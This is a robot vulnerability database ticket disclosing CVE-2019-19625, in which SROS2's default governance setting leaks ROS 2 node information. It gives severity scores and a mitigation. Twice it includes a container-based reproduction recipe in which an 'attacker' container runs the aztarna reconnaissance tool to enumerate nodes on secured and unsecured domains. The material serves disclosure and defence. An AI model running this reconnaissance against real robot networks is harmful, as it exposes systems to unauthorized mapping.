RVD#922: SROS2 leaks node information

[vmayoral]

cve: CVE-2019-19625
cwe: CWE-200 (Information Exposure)
description: We found that SROS 2, the tools to generate and distribute keys for ROS
  2 and use the underlying security plugins of DDS from ROS 2 leak node information
  due to a leaky default configuration as inidicated at https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13.
  This exposure was first raised in the Security Workshop of ROSCon 2019 (Nov. 2019).
  Further debugging the flaw indicates that there might be some additional underlying
  issues.
exploitation:
  description: A simple use of ros2cli allows to exploit this flaw. See https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
    for a walkthrough.
  exploitation-image: Not available
  exploitation-vector: Not available
  exploitation-recipe:
    networks:
      - network:
        - driver: overlay
        - name: net1
        - encryption: true
        - subnet: 12.0.0.0/24

      - network:
        - driver: overlay
        - name: net2
        - encryption: false
        - subnet: 13.0.0.0/24

    containers:
      - container:
        - name: subject1
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - network: net1
      - container:
        - name: subject2
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
             - network: net1
      - container:
        - name: attacker
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
             - network:
                - net1
                - net2

    flow:
      - container:
        - name: subject1
        - window:
            - name: unsecure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
        - select: unsecure
      - container:
        - name: subject2
        - window:
            - name: secure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
              - command: "ros2 run demo_nodes_cpp talker"
              - command: "export ROS_SECURITY_ENABLE=true"
              - command: "export ROS_SECURITY_STRATEGY=Enforce"
              - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
              - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
              - command: "env | grep ROS"  # from this point on, there's security enabled
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "cd /opt/ros2_ws/"
              - command: "mkdir policy"
              # generate a security policy based on our current graph
              - command: "ros2 security generate_policy policy/my_policy.xml"
              - command: "cat policy/my_policy.xml"
              #  populated the keystore for all profiles
              - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
              - command: "kill -9 $(pidof talker)"
        - select: secure
      - container:
        - name: attacker
        - window:
            - name: attacker_window
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "aztarna -t ros2 -d 0 --daemon -e"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - type: "aztarna -t ros2 -d 1 --daemon -e"
        - select: attacker_window
      - attach: subject2  
flaw:
  application: any ROS 2 node communicating
  architectural-location: platform code
  date-detected: null
  date-reported: '2019-12-06'
  detected-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  detected-by-method: runtime detection
  issue: https://github.com/aliasrobotics/RVD/issues/922
  languages: Python
  package: sros2
  phase: runtime-operation
  reported-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  reported-by-relationship: security researcher
  reproducibility: always
  reproduction: https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
  reproduction-image: Not available
  specificity: ROS-specific
  subsystem: cognition:middleware
  trace: N/A
id: 922
keywords:
- Robot Operating System 2
- ROS 2
- eloquent
- dashing
links:
- https://ros-swg.github.io/ROSCon19_Security_Workshop/
- https://github.com/ros-swg/turtlebot3_demo
- https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13
- https://design.ros2.org/articles/ros2_dds_security.html
- https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
mitigation:
  date-mitigation: null
  description: Modify the policy and set rtps_protection_kind to ENCRYPT
  pull-request: https://github.com/ros2/sros2/pull/171
severity:
  cvss-score: 7.5
  cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  rvss-score: 6.5
  rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N
  severity-description: high
system: ros2
title: 'RVD#922: SROS2 leaks node information'
type: exposure
vendor: ''

[vmayoral]

Ticket updated, PR added.

[vmayoral]

alurity.yml file to reproduce sros2 leak

networks:
  - network:
    - driver: overlay
    - name: net1
    - encryption: true
    - subnet: 12.0.0.0/24

  - network:
    - driver: overlay
    - name: net2
    - encryption: false
    - subnet: 13.0.0.0/24

containers:
  - container:
    - name: subject1
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - network: net1
  - container:
    - name: subject2
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
         - network: net1
  - container:
    - name: attacker
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
         - network:
            - net1
            - net2

flow:
  - container:
    - name: subject1
    - window:
        - name: unsecure
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=0"
          - command: "ros2 run demo_nodes_cpp talker"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=0"
          - command: "env | grep ROS"  # this shows there's no security enabled at this point
    - select: unsecure
  - container:
    - name: subject2
    - window:
        - name: secure
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=1"
          - command: "env | grep ROS"  # this shows there's no security enabled at this point
          - command: "ros2 run demo_nodes_cpp talker"
          - command: "export ROS_SECURITY_ENABLE=true"
          - command: "export ROS_SECURITY_STRATEGY=Enforce"
          - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
          - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
          - command: "env | grep ROS"  # from this point on, there's security enabled
          - command: "ros2 run demo_nodes_cpp talker"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=1"
          - command: "cd /opt/ros2_ws/"
          - command: "mkdir policy"
          # generate a security policy based on our current graph
          - command: "ros2 security generate_policy policy/my_policy.xml"
          - command: "cat policy/my_policy.xml"
          #  populated the keystore for all profiles
          - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
          - command: "kill -9 $(pidof talker)"
    - select: secure
  - container:
    - name: attacker
    - window:
        - name: attacker_window
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "aztarna -t ros2 -d 0 --daemon -e"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - type: "aztarna -t ros2 -d 1 --daemon -e"
    - select: attacker_window
  - attach: subject2